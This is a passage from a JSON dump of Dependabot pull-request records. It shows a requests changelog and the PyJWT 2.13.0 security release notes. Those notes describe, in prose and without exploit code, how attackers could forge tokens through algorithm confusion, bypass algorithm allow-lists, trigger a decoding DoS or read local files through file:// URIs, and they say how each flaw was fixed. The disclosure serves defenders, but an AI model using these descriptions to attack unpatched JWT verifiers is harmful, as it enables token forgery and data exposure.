(2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/psf/requests/compare/v2.34.0...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/hyperledger-identus/cloud-agent/pull/1800","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/hyperledger-identus%2Fcloud-agent/issues/1800","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1800/packages"}},{"old_version":"\u003e=2.8.0","new_version":"\u003e=2.13.0","update_type":"minor","path":"/itsm-api","pr_created_at":"2026-06-02T03:46:26.000Z","version_change":"\u003e=2.8.0 → \u003e=2.13.0","issue":{"uuid":"4568233803","node_id":"PR_kwDORjwygs7hn52j","number":45,"state":"open","title":"chore(deps): Update pyjwt requirement from \u003e=2.8.0 to \u003e=2.13.0 in /itsm-api","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-02T03:46:26.000Z","updated_at":"2026-06-02T03:46:26.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): Update","packages":[{"name":"pyjwt","old_version":"\u003e=2.8.0","new_version":"\u003e=2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/itsm-api","ecosystem":"pip"},"body":"Updates the requirements on [pyjwt](https://github.com/jpadilla/pyjwt) to permit the latest version.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/a4e1a3d1218b01c5806420b8f16d9308ac4adc30\"\u003e\u003ccode\u003ea4e1a3d\u003c/code\u003e\u003c/a\u003e Add typing_extensions dependency for Python \u0026lt; 3.11 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1151\"\u003e#1151\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/bd9700cca7f9258fadcc429c1034e508025931f2\"\u003e\u003ccode\u003ebd9700c\u003c/code\u003e\u003c/a\u003e Use PyJWK algorithm when encoding without explicit algorithm (\u003ca 